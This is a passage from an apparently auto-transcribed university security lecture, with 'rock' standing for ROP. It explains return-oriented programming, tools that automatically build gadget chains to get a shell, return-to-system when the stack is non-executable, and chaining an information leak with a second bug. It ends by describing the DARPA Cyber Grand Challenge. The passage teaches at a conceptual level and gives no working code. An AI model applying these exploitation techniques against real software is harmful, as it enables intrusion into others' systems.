is, we actually don't care because we're only using fixed locations. So you should not have to write this by yourself. I wanted to show this to you. There are tools called rock gadget and rocker, which basically you point them to a binary. They will try to find as many gadgets as they can. And if possible, actually automatically generate a rock chain to get a slash bin slash SH. So it's really cool. Yeah, I actually use those a lot. I kind of jumped past our conjection. So if they've disabled stack execution, but there are, let's say, a call to the function system in the short snippet of code, without an executable stack, you can still modify the parameters going into that call to the system function to take control of the execution for that way. If you know where the system call is actually located, which it depends. Sometimes you can know, sometimes you can. And often, oftentimes what you'll actually need in the real world is multiple exploits and vulnerabilities together. So you may need one vulnerability that leaks data and leaks a pointer. So that tells you where the location of everything is. And then you can break that by kind of jumping to where that location is. So yeah, I need to focus on one thing. And rock is definitely this is the most real-world type thing that you can do and get to. So this is why I want to talk about this here. Because it bypasses almost all of the current. And there's all kinds of variations. So go briefly. Research in this is to automate all of these. So we have a new professor in the department. We may not know yet because he just started a Yann Shoshishvashvili. He led the DARPA Cyber Grand Challenge team at UC Santa Barbara where they got third place and won, I think, a total of $1.5 million by creating an automated hacking system, which basically, so they were completely autonomous systems. There was 10 teams. They each had access to a number of binaries and their system had to find, identify vulnerabilities in those binaries, automatically synthesize exploits that would work against the other teams, and also inject patches into their binaries to probably patch the binaries. And then you would get, if you chose to patch, you would get everyone else's patches so you could actually try to find maybe vulnerabilities that were still left over from their patches. So it's a super interesting thing process, how to exploit these automatically, how to create better defensive techniques, how to combat the problem of multiple vulnerabilities and information disclosure and all that stuff. So it's a super awesome research area. All right. Sweet. Have a good next year.